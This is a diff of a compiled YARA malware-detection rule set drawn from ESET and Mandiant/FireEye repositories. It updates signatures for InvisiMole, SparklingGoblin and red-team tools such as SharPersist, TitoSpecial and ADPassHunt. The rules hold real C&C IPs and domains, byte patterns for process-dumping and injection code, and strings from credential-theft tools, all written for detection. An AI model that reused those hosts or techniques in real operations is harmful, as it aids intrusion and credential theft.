-		$check_magic_old_32 = {3? F9 FF D0 DE}
-		$check_magic_old_64 = {3? 64 FF D0 DE}
-		$check_magic_new_32 = {81 3? 86 DA 11 CE}
-		$check_magic_new_64 = {81 3? 64 DA 11 CE}
+		$chunk_1 = {
+            48 8D 0D ?? ?? ?? ??
+            C7 44 24 ?? 48 31 C0 C3
+            FF 15 ?? ?? ?? ??
+            48 8B C8
+            48 8D 15 ?? ?? ?? ??
+            FF 15 ?? ?? ?? ??
+            83 64 24 ?? 00
+            4C 8D 4C 24 ??
+            BF 04 00 00 00
+            48 8B C8
+            8B D7
+            48 8B D8
+            44 8D 47 ??
+            FF 15 ?? ?? ?? ??
+            44 8B C7
+            48 8D 54 24 ??
+            48 8B CB
+            E8 ?? ?? ?? ??
+            44 8B 44 24 ??
+            4C 8D 4C 24 ??
+            8B D7
+            48 8B CB
+            FF 15 ?? ?? ?? ??
+            48 8B 05 ?? ?? ?? ??
+        }
+		$chunk_2 = {
+            55
+            8B EC
+            51
+            51
+            57
+            68 08 1A 41 00
+            66 C7 45 ?? C2 14
+            C6 45 ?? 00
+            FF 15 ?? ?? ?? ??
+            68 10 1A 41 00
+            50
+            FF 15 ?? ?? ?? ??
+            83 65 ?? 00
+            8B F8
+            8D 45 ??
+            50
+            6A 40
+            6A 03
+            57
+            FF 15 ?? ?? ?? ??
+            6A 03
+            8D 45 ??
+            50
+            57
+            E8 ?? ?? ?? ??
+            83 C4 0C
+            8D 45 ??
+            50
+            FF 75 ??
+            6A 03
+            57
+            FF 15 ?? ?? ?? ??
+        }
+		$chunk_3 = {
+            48 8D 0D ?? ?? ?? ??
+            C7 44 24 ?? 48 31 C0 C3
+            FF 15 ?? ?? ?? ??
+            48 8B C8
+            48 8D 15 ?? ?? ?? ??
+            FF 15 ?? ?? ?? ??
+        }
 
 	condition:
-		(( uint16( 0 ) == 0x5A4D ) or ESET_Invisimole_Blob_PRIVATE ) and ( any of ( $check_magic* ) ) and ( 2 of ( $s* ) )
+		any of them
 }
-rule ESET_Apt_Windows_Invisimole_C2 : FILE
+rule ESET_Sparklinggoblin_Mutex
 {
 	meta:
-		description = "InvisiMole C&C servers"
+		description = "SparklingGoblin ChaCha20 loaders mutexes"
 		author = "ESET Research"
-		id = "9279c8cd-2c16-5f90-a7f5-e668d57c805b"
-		date = "2021-05-17"
-		modified = "2021-05-17"
+		id = "e33d2bc1-29d6-5117-8e0f-31f8bced0979"
+		date = "2021-05-20"
+		modified = "2021-08-26"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/invisimole/invisimole.yar#L257-L297"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/sparklinggoblin/SparklingGoblin.yar#L465-L489"
 		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		logic_hash = "aff8456ce7a9ebe875c02e51c09b77ee7b1fddfc11d4ad236e12c8c5240a01a8"
+		hash = "2edbea43f5c40c867e5b6bbd93cc972525df598b"
+		hash = "b6d245d3d49b06645c0578804064ce0c072cbe0f"
+		hash = "8be6d5f040d0085c62b1459afc627707b0de89cf"
+		hash = "4668302969fe122874fb2447a80378dcb671c86b"
+		hash = "9bdecb08e16a23d271d0a3e836d9e7f83d7e2c3b"
+		hash = "9ce7650f2c08c391a35d69956e171932d116b8bd"
+		logic_hash = "00fbd514c8e2d6dea3b0f175e857a613e158b64caf1f970e814d62f1ebe9d35c"
 		score = 75
-		quality = 78
-		tags = "FILE"
+		quality = 80
+		tags = ""
 		license = "BSD 2-Clause"
-		version = "1"
 
 	strings:
-		$s1 = "46.165.220.228" ascii wide
-		$s2 = "80.255.3.66" ascii wide
-		$s3 = "85.17.26.174" ascii wide
-		$s4 = "185.193.38.55" ascii wide
-		$s5 = "194.187.249.157" ascii wide
-		$s6 = "195.154.255.211" ascii wide
-		$s7 = "153.re" ascii wide fullword
-		$s8 = "adstat.red" ascii wide
-		$s9 = "adtrax.net" ascii wide
-		$s10 = "akamai.sytes.net" ascii wide
-		$s11 = "amz-eu401.com" ascii wide
-		$s12 = "blabla234342.sytes.net" ascii wide
-		$s13 = "mx1.be" ascii wide fullword
-		$s14 = "statad.de" ascii wide
-		$s15 = "time.servehttp.com" ascii wide
-		$s16 = "upd.re" ascii wide fullword
-		$s17 = "update.xn--6frz82g" ascii wide
-		$s18 = "updatecloud.sytes.net" ascii wide
-		$s19 = "updchecking.sytes.net" ascii wide
-		$s20 = "wlsts.net" ascii wide
-		$s21 = "ro2.host" ascii wide fullword
-		$s22 = "2ld.xyz" ascii wide fullword
-		$s23 = "the-haba.com" ascii wide
-		$s24 = "82.202.172.134" ascii wide
-		$s25 = "update.xn--6frz82g" ascii wide
+		$mutex_1 = "kREwdFrOlvASgP4zWZyV89m6T2K0bIno"
+		$mutex_2 = "v5EPQFOImpTLaGZes3Nl1JSKHku8AyCw"
 
 	condition:
-		(( uint16( 0 ) == 0x5A4D ) or ESET_Invisimole_Blob_PRIVATE ) and $s21 and any of them
+		any of them
 }
 /*
  * YARA Rule Set
  * Repository Name: FireEye-RT
  * Repository: https://github.com/mandiant/red_team_tool_countermeasures/
- * Retrieval Date: 2025-06-08
+ * Retrieval Date: 2025-06-15
  * Git Commit: 3561b71724dbfa3e2bb78106aaa2d7f8b892c43b
  * Number of Rules: 167
  * Skipped: 0 (age), 4 (quality), 0 (score), 0 (importance)
@@ -71364,1299 +71924,1059 @@ OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 
  */
-rule FIREEYE_RT_APT_Hacktool_MSIL_REVOLVER_1 : FILE
+rule FIREEYE_RT_Hacktool_MSIL_Sharpschtask_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'revolver' project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'SharpSchtask' project."
 		author = "FireEye"
-		id = "8fa5adb7-dc66-51bc-9f60-2308515f33a8"
+		id = "5c7a5dee-3bc2-54b2-a7e2-be05ba74d4a1"
 		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REVOLVER/production/yara/APT_HackTool_MSIL_REVOLVER_1.yar#L4-L16"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPSCHTASK/production/yara/HackTool_MSIL_SharpSchtask_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
 		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "8df8a56ed55b7857adb95daa643d544a49eb5f1952b4ad3ef757c34dad2ce317"
+		logic_hash = "7437fde82920f4d015a7f149b58924baf6cb220c6f6857d9509e23795ff0811c"
 		score = 75
-		quality = 71
+		quality = 73
 		tags = "FILE"
-		rev = 2
+		rev = 1
 
 	strings:
-		$typelibguid0 = "a8bdbba4-7291-49d1-9a1b-372de45a9d88" ascii nocase wide
-		$typelibguid1 = "b214d962-7595-440b-abef-f83ecdb999d2" ascii nocase wide
+		$typelibguid0 = "0a64a5f4-bdb6-443c-bdc7-f6f0bf5b5d6c" ascii nocase wide
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_FE_APT_Loader_MSIL_REVOLVER_1 : FILE
-{
-	meta:
-		description = "No description has been set in the source file - FireEye-RT"
-		author = "FireEye"
-		id = "d99620e0-39ed-58db-acce-0d885a9e0bf7"
-		date = "2020-12-18"
-		modified = "2020-12-18"
-		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REVOLVER/production/yara/APT_Loader_MSIL_REVOLVER_1.yar#L5-L14"
-		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		logic_hash = "1231f4c961dec122ebcb142052c2c7c03acf9b556cdb71a3efabde6bcf50a939"
-		score = 75
-		quality = 50
-		tags = "FILE"
-
-	strings:
-		$inject = { 28 [2] 00 06 0? 0? 7B [2] 00 04 7E [2] 00 0A 28 [2] 00 0A [2-40] 7E [2] 00 0A 0? 20 00 10 00 00 28 [2] 00 0A 0? 28 [2] 00 0A 6F [2] 00 0A 1? ?? 7E [2] 00 0A 1? ?? 20 00 30 00 00 1F 40 28 [2] 00 06 [2-40] 28 [2] 00 0A 1? 3? ?? 7E [2] 00 04 7E [2] 00 04 28 [2] 00 0A 28 [2] 00 06 1? ?? 1? ?? 1? 0? 1? ?? 8? 6? 28 [2] 00 0A 2? ?? 7E [2] 00 04 7E [2] 00 04 28 [2] 00 0A 28 [2] 00 06 1? ?? 1? ?? 1? 0? 1? ?? 8? 6? 28 [2] 00 0A 1? ?? FE 15 [2] 00 02 1? ?? 72 [2] 00 70 28 [2] 00 06 1? ?? FE 15 [2] 00 02 1? ?? 1? ?? 1? 28 [2] 00 06 2? 7E [2] 00 0A 1? ?? 0? 7B [2] 00 04 1? ?? 1? 1? ?? 28 [2] 00 06 2? ?? 1? ?? 7E [2] 00 0A 28 [2] 00 0A [2-10] 7E [2] 00 0A 1? ?? 1? ?? 20 [2] 1F 00 7E [2] 00 0A 28 [2] 00 0A 6F [2] 00 0A 1? ?? 7E [2] 00 0A 1? 1? 20 [2] 00 00 20 [2] 00 00 7E [2] 00 0A 28 [2] 00 06 2? 1? ?? 7E [2] 00 0A 28 [2] 00 0A [2-40] 1? ?? 0? 7E [2] 00 0A 7E [2] 00 0A 7E [2] 00 0A 28 [2] 00 06 2? ?? 2? 1? 1? ?? 1? ?? 1? ?? 28 [2] 00 06 }
-		$iz1 = /_Cor(Exe|Dll)Main/ fullword
-
-	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
-}
-rule FIREEYE_RT_Hacktool_MSIL_Sharpersist_1 : FILE
+rule FIREEYE_RT_Hacktool_MSIL_Wmisharp_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the SharPersist project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'WMISharp' project."
 		author = "FireEye"
-		id = "586e6c91-6970-57d1-8d8c-05ae9eb6117a"
+		id = "97b9d057-30d3-5af7-bac6-4dd53f47650f"
 		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPERSIST/production/yara/HackTool_MSIL_SharPersist_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/WMISHARP/production/yara/HackTool_MSIL_WMISharp_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "98ecf58d48a3eae43899b45cec0fc6b7"
-		logic_hash = "cf480026c31b522850e25ba2d7986773d9c664242a2667ecd33151621c98c91e"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "d119d52c1410291d582696d5c4c1de3db9008db963c76a9e344959d869c3acc0"
 		score = 75
 		quality = 73
 		tags = "FILE"
 		rev = 1
 
 	strings:
-		$typelibguid1 = "9D1B853E-58F1-4BA5-AEFC-5C221CA30E48" ascii nocase wide
+		$typelibguid0 = "3a2421d9-c1aa-4fff-ad76-7fcb48ed4bff" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $typelibguid1
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_Hacktool_MSIL_Sharpersist_2 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_DTRIM_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'dtrim' project, which is a modified version of SharpSploit."
 		author = "FireEye"
-		id = "49d7891e-b97a-52a8-acfd-bbf986732d6c"
+		id = "9be695a1-6d18-5952-974c-96a30f035e7a"
 		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPERSIST/production/yara/HackTool_MSIL_SharPersist_2.yar#L4-L23"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DTRIM/production/yara/APT_HackTool_MSIL_DTRIM_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "98ecf58d48a3eae43899b45cec0fc6b7"
-		logic_hash = "57387352f8fd08e8b859dffc1164d46370f248b337526c265634160010572a00"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "357c1f76631ec9ee342995cd12369fd9ff18c541bffe6f5464b1e8db45057196"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		rev = 1
+		rev = 2
 
 	strings:
-		$a1 = "SharPersist.lib"
-		$a2 = "SharPersist.exe"
-		$b1 = "ERROR: Invalid hotkey location option given." ascii wide
-		$b2 = "ERROR: Invalid hotkey given." ascii wide
-		$b3 = "ERROR: Keepass configuration file not found." ascii wide
-		$b4 = "ERROR: Keepass configuration file was not found." ascii wide
-		$b5 = "ERROR: That value already exists in:" ascii wide
-		$b6 = "ERROR: Failed to delete hidden registry key." ascii wide
-		$pdb1 = "\\SharPersist\\"
-		$pdb2 = "\\SharPersist.pdb"
+		$typelibguid0 = "7760248f-9247-4206-be42-a6952aa46da2" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( ( @pdb2 [ 1 ] < @pdb1 [ 1 ] + 50 ) or ( 1 of ( $a* ) and 2 of ( $b* ) ) )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_Hacktool_Win32_Andrewspecial_1 : FILE
+rule FIREEYE_RT_Credtheft_MSIL_Adpasshunt_2 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "69e27e92-d68e-5543-bada-170e32733dbb"
-		date = "2020-11-25"
-		date = "2020-11-25"
-		modified = "2020-12-09"
-		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TITOSPECIAL/production/yara/HackTool_Win32_AndrewSpecial_1.yar#L4-L18"
-		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "e89efa88e3fda86be48c0cc8f2ef7230"
-		logic_hash = "529a49fb21250069111d03a174901dc2e1623ee2a1f446aae1bdb1579a227dd3"
-		score = 75
-		quality = 75
-		tags = "FILE"
-		rev = 4
-
-	strings:
-		$dump = { 6A 00 68 FF FF 1F 00 FF 15 [4] 89 45 ?? 83 [2] 00 [1-50] 6A 00 68 80 00 00 00 6A 02 6A 00 6A 00 68 00 00 00 10 68 [4] FF 15 [4] 89 45 [10-70] 6A 00 6A 00 6A 00 6A 02 8B [2-4] 5? 8B [2-4] 5? 8B [2-4] 5? E8 [4-20] FF 15 }
-		$shellcode_x86 = { B8 3C 00 00 00 33 C9 8D 54 24 04 64 FF 15 C0 00 00 00 83 C4 04 C2 14 00 }
-		$shellcode_x86_inline = { C6 45 ?? B8 C6 45 ?? 3C C6 45 ?? 00 C6 45 ?? 00 C6 45 ?? 00 C6 45 ?? 33 C6 45 ?? C9 C6 45 ?? 8D C6 45 ?? 54 C6 45 ?? 24 C6 45 ?? 04 C6 45 ?? 64 C6 45 ?? FF C6 45 ?? 15 C6 45 ?? C0 C6 45 ?? 00 C6 45 ?? 00 C6 45 ?? 00 C6 45 ?? 83 C6 45 ?? C4 C6 45 ?? 04 C6 45 ?? C2 C6 45 ?? 14 C6 45 ?? 00 }
-
-	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and $dump and any of ( $shellcode* )
-}
-rule FIREEYE_RT_Credtheft_MSIL_Titospecial_2 : FILE
-{
-	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the TitoSpecial project. There are 2 GUIDs in this rule as the x86 and x64 versions of this tool use a different ProjectGuid."
-		author = "FireEye"
-		id = "0262c720-e6b8-5bf2-a242-19a7f044973f"
+		id = "b6103e23-8d1c-5d01-b283-f4545ccb924e"
 		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TITOSPECIAL/production/yara/CredTheft_MSIL_TitoSpecial_2.yar#L4-L16"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/ADPASSHUNT/production/yara/CredTheft_MSIL_ADPassHunt_2.yar#L4-L19"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "4bf96a7040a683bd34c618431e571e26"
-		logic_hash = "2f621f8de2a4679e6cbce7f41859eaa3095ca54090c8bfccd3b767590ac91f2c"
-		score = 75
-		quality = 71
+		hash = "6efb58cf54d1bb45c057efcfbbd68a93"
+		logic_hash = "e7282905a8baeaeb8ec156171fbf2bc4ac811facb80959a88394f4938a145cc1"
+		score = 50
+		quality = 75
 		tags = "FILE"
-		rev = 4
+		rev = 1
 
 	strings:
-		$typelibguid1 = "C6D94B4C-B063-4DEB-A83A-397BA08515D3" ascii nocase wide
-		$typelibguid2 = "3b5320cf-74c1-494e-b2c8-a94a24380e60" ascii nocase wide
+		$pdb1 = "\\ADPassHunt\\"
+		$pdb2 = "\\ADPassHunt.pdb"
+		$s1 = "Usage: .\\ADPassHunt.exe"
+		$s2 = "[ADA] Searching for accounts with msSFU30Password attribute"
+		$s3 = "[ADA] Searching for accounts with userpassword attribute"
+		$s4 = "[GPP] Searching for passwords now"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( $typelibguid1 or $typelibguid2 )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( ( @pdb2 [ 1 ] < @pdb1 [ 1 ] + 50 ) or 2 of ( $s* ) )
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_TITOSPECIAL_1 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_Adpasshunt_2 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "b12490ba-41f6-5469-bcbb-0d2e0055c193"
-		date = "2020-11-25"
-		date = "2020-11-25"
+		id = "a3b12fd7-e82d-5ef0-9125-7c069cd9bec4"
+		date = "2020-12-02"
+		date = "2020-12-02"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TITOSPECIAL/production/yara/APT_HackTool_MSIL_TITOSPECIAL_1.yar#L4-L20"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/ADPASSHUNT/production/yara/APT_HackTool_MSIL_ADPassHunt_2.yar#L4-L23"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "4bf96a7040a683bd34c618431e571e26"
-		logic_hash = "6def0c667d38c1bad9233628e509bdcaed322e75be4ff3823b0f788c391e090c"
-		score = 75
+		hash = "6efb58cf54d1bb45c057efcfbbd68a93"
+		logic_hash = "e2dc7db1860eef04a569f007c32abd507dd588d1392613efbb31f42ca66ff735"
+		score = 50
 		quality = 75
 		tags = "FILE"
-		rev = 5
+		rev = 1
 
 	strings:
-		$ind_dump = { 1F 10 16 28 [2] 00 0A 6F [2] 00 0A [50-200] 18 19 18 73 [2] 00 0A 13 [1-4] 06 07 11 ?? 6F [2] 00 0A 18 7E [2] 00 0A 7E [2] 00 0A 7E [2] 00 0A 28 [2] 00 06 }
-		$ind_s1 = "NtReadVirtualMemory" fullword wide
-		$ind_s2 = "WriteProcessMemory" fullword
-		$shellcode_x64 = { 4C 8B D1 B8 3C 00 00 00 0F 05 C3 }
-		$shellcode_x86 = { B8 3C 00 00 00 33 C9 8D 54 24 04 64 FF 15 C0 00 00 00 83 C4 04 C2 14 00 }
+		$s1 = "LDAP://" wide
+		$s2 = "[GPP] Searching for passwords now..." wide
+		$s3 = "Searching Group Policy Preferences (Get-GPPPasswords + Get-GPPAutologons)!" wide
+		$s4 = "possibilities so far)..." wide
+		$s5 = "\\groups.xml" wide
+		$s6 = "Found interesting file:" wide
+		$s7 = "\x00GetDirectories\x00"
+		$s8 = "\x00DirectoryInfo\x00"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of ( $ind* ) and any of ( $shellcode* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_Hacktool_Win64_Andrewspecial_1 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_Adpasshunt_1 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "20ce4902-4eb3-5ecf-aa8c-0515965dde57"
-		date = "2020-11-25"
-		date = "2020-11-25"
+		id = "736b5300-215b-5314-9234-69ff0050b73e"
+		date = "2020-12-02"
+		date = "2020-12-02"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TITOSPECIAL/production/yara/HackTool_Win64_AndrewSpecial_1.yar#L4-L18"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/ADPASSHUNT/production/yara/APT_HackTool_MSIL_ADPassHunt_1.yar#L4-L17"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "4456e52f6f8543c3ba76cb25ea3e9bd2"
-		logic_hash = "96f06c46dfec795fcfd08c188853d0a3f781003ae118833719a175eb59049c0d"
-		score = 75
+		hash = "6efb58cf54d1bb45c057efcfbbd68a93"
+		logic_hash = "63135c81c1a6b967cb26cced628afc0e7ef485923e6a7fd70a4d4672118d6a8c"
+		score = 50
 		quality = 75
 		tags = "FILE"
-		rev = 5
+		rev = 2
 
 	strings:
-		$dump = { 33 D2 B9 FF FF 1F 00 FF 15 [10-90] 00 00 00 00 [2-6] 80 00 00 00 [2-6] 02 00 00 00 45 33 C9 45 33 C0 BA 00 00 00 10 48 8D 0D [4] FF 15 [4-120] 00 00 00 00 [2-6] 00 00 00 00 [2-6] 00 00 00 00 41 B9 02 00 00 00 [6-15] E8 [4-20] FF 15 }
-		$shellcode_x64 = { 4C 8B D1 B8 3C 00 00 00 0F 05 C3 }
-		$shellcode_x64_inline = { C6 44 24 ?? 4C C6 44 24 ?? 8B C6 44 24 ?? D1 C6 44 24 ?? B8 C6 44 24 ?? 3C C6 44 24 ?? 00 C6 44 24 ?? 00 C6 44 24 ?? 00 C6 44 24 ?? 0F C6 44 24 ?? 05 C6 44 24 ?? C3 }
+		$sb1 = { 73 [2] 00 0A 0A 02 6F [2] 00 0A 0B 38 [4] 12 ?? 28 [2] 00 0A 0? 73 [2] 00 0A 0? 0? 0? 6F [2] 00 0A 1? 13 ?? 72 [4] 13 ?? 0? 6F [2] 00 0A 72 [4] 6F [2] 00 0A 1? 3B [4] 11 ?? 72 [4] 28 [2] 00 0A 13 ?? 0? 72 [4] 6F [2] 00 0A 6F [2] 00 0A 13 ?? 38 [4] 11 ?? 6F [2] 00 0A 74 [2] 00 01 13 ?? 11 ?? 72 [4] 6F [2] 00 0A 2C ?? 11 ?? 72 [4] 11 ?? 6F [2] 00 0A 72 [4] 6F [2] 00 0A 6F [2] 00 0A 72 [4] 28 [2] 00 0A }
+		$sb2 = { 02 1? 8D [2] 00 01 [0-32] 1? 1F 2E 9D 6F [2] 00 0A 72 [4] 0A 0B 1? 0? 2B 2E 0? 0? 9A 0? 0? 72 [4] 6F [2] 00 0A 2D ?? 06 72 [4] 28 [2] 00 0A 0A 06 72 [4] 0? 28 [2] 00 0A 0A 0? 1? 58 0? 0? 0? 8E 69 32 CC 06 2A }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and $dump and any of ( $shellcode* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_Credtheft_MSIL_Titospecial_1 : FILE
+rule FIREEYE_RT_Credtheft_MSIL_Adpasshunt_1 : FILE
 {
 	meta:
-		description = "This rule looks for .NET PE files that have the strings of various method names in the TitoSpecial code."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public ADPassHunt project."
 		author = "FireEye"
-		id = "932bb013-03de-5cf7-89e9-b3232151d303"
+		id = "35fb8032-c73a-549f-9bd9-409f7050bdb0"
 		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TITOSPECIAL/production/yara/CredTheft_MSIL_TitoSpecial_1.yar#L4-L27"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/ADPASSHUNT/production/yara/CredTheft_MSIL_ADPassHunt_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "4bf96a7040a683bd34c618431e571e26"
-		logic_hash = "4ac9a5ede4aea5d73545b459eb635f87ce08ba521afa48b76d2cfa94f1379226"
-		score = 75
-		quality = 75
+		hash = "6efb58cf54d1bb45c057efcfbbd68a93"
+		logic_hash = "85c7c147d6bf5b7cb417ff2910a3e7ab3be5e8a3651758c07f8f0ed42b5964d8"
+		score = 50
+		quality = 73
 		tags = "FILE"
 		rev = 4
 
 	strings:
-		$str1 = "Minidump" ascii wide
-		$str2 = "dumpType" ascii wide
-		$str3 = "WriteProcessMemory" ascii wide
-		$str4 = "bInheritHandle" ascii wide
-		$str5 = "GetProcessById" ascii wide
-		$str6 = "SafeHandle" ascii wide
-		$str7 = "BeginInvoke" ascii wide
-		$str8 = "EndInvoke" ascii wide
-		$str9 = "ConsoleApplication1" ascii wide
-		$str10 = "getOSInfo" ascii wide
-		$str11 = "OpenProcess" ascii wide
-		$str12 = "LoadLibrary" ascii wide
-		$str13 = "GetProcAddress" ascii wide
+		$typelibguid = "15745B9E-A059-4AF1-A0D8-863E349CD85D" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of ( $str* )
+		uint16( 0 ) == 0x5A4D and $typelibguid
 }
